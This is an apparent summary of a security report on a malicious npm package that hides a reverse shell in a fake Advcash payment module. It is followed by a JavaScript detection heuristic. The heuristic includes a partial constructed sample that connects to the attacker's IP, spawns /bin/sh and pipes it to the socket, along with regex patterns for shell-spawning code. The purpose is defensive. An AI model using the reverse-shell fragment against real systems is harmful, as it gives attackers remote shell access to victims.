The article discusses a malicious npm package, @naderabdi/merchant-advcash, which embeds a reverse shell trigger disguised as a legitimate payment processing module for the Advcash payment platform. The threat targets end users making transactions and gives the attacker remote shell access to their systems.
Affected: npm package, Advcash platform, end users
Key points:
- A malicious npm package called @naderabdi/merchant-advcash has been discovered.
- The package contains a reverse shell triggered during payment success events.
- It poses as a legitimate Advcash payment processing module.
- The reverse shell connects to the attacker’s server at IP address 65.109.184.223 over TCP port 8443.
- Real business logic is implemented to disguise its true purpose.
- Similar stealthy techniques have been observed in recent malware incidents.
- The malicious code executes only after transactions complete, making it hard to detect.
- The package was reported and removed from npm to prevent further exploitation.
- Supply-chain monitoring tools such as Socket can help detect such threats.
MITRE Techniques:
- T1071 – Application Layer Protocol: The package uses legitimate application layer protocols for payment processing.
- T1059 – Command and Scripting Interpreter: The reverse shell invokes a shell command via Node.js modules (net, child_process).
- T1203 – Exploitation for Client Execution: Exploits the context of trust in payment processing to execute malicious code.
Indicators of Compromise:
- [Malicious Package] @naderabdi/merchant-advcash
- [IP Address] 65.109.184.223
- [Port] 8443
- [Trigger Point] url_success() callback
- [Hashing Algorithm] SHA-256 used for payment token masking
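The trigger pattern described above (a raw TCP client from `net` wired to a shell spawned via `child_process`, firing inside the `url_success()` callback) is something a defender can look for statically in installed packages. The following added example is not code from the report or from Socket; it is a small triage heuristic that scores JavaScript source for that shape and for the published IP/port, run over two constructed samples (the module bodies, hostnames and variable names are made up for illustration).

```javascript
// Indicators taken from the report; everything else here is constructed for illustration.
const IOC = { ip: "65.109.184.223", port: 8443 };

// Each rule is one building block of the net + child_process reverse-shell shape.
const RULES = [
  { id: "net_import", weight: 1, re: /require\(\s*["']net["']\s*\)|from\s+["']net["']/ },
  { id: "child_process_import", weight: 1, re: /require\(\s*["']child_process["']\s*\)|from\s+["']child_process["']/ },
  { id: "tcp_connect", weight: 1, re: /\b(?:net\.)?(?:connect|createConnection)\s*\(/ },
  { id: "shell_spawn", weight: 2, re: /\b(?:spawn|exec)\s*\(\s*["'](?:\/bin\/)?(?:sh|bash|cmd(?:\.exe)?|powershell)["']/ },
  { id: "stdio_pipe", weight: 2, re: /\.pipe\(\s*\w+\.(?:stdin|stdout)\s*\)|\.(?:stdout|stderr)\.pipe\(/ },
];

// Returns a verdict plus the evidence behind it, so an analyst can see why a file was flagged.
function triage(source) {
  const matched = RULES.filter((r) => r.re.test(source));
  const hits = matched.map((r) => r.id);
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  const iocIp = source.includes(IOC.ip);
  const iocPort = new RegExp(`\\b${IOC.port}\\b`).test(source);
  // A known-bad IP is decisive on its own; otherwise require socket + shell + piping together,
  // since any one of them alone is common in legitimate tooling.
  const shellShape = hits.includes("tcp_connect") && hits.includes("shell_spawn") && hits.includes("stdio_pipe");
  const verdict = (iocIp || shellShape) ? "suspicious" : (score >= 3 ? "review" : "clean");
  return { verdict, score, hits, ioc: { ip: iocIp, port: iocPort } };
}

// Constructed sample mimicking the reported trigger (deliberately incomplete; wiring omitted).
const MALICIOUS_SAMPLE = `
const net = require("net");
const { spawn } = require("child_process");
function url_success(payment) {
  const sock = net.connect(8443, "65.109.184.223");
  const sh = spawn("/bin/sh");
  sh.stdout.pipe(sock); /* remaining wiring omitted */
}`;

// Constructed benign module: HTTPS API call plus SHA-256 token masking, no sockets or shells.
const BENIGN_SAMPLE = `
const https = require("https");
const crypto = require("crypto");
function maskToken(token) { return crypto.createHash("sha256").update(token).digest("hex"); }
function url_success(payment) {
  return https.request({ host: "merchant-api.example", path: "/confirm/" + maskToken(payment.id) });
}`;

console.log(triage(MALICIOUS_SAMPLE)); // verdict "suspicious", score 7, both IoCs matched
console.log(triage(BENIGN_SAMPLE));    // verdict "clean", score 0
```

Pointing the same function at every `.js` file under `node_modules` turns this into a quick post-install sweep; treat "review" results as a prompt for manual reading rather than a conviction.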
Full Story: https://socket.dev/blog/npm-package-advcash-integration-triggers-reverse-shell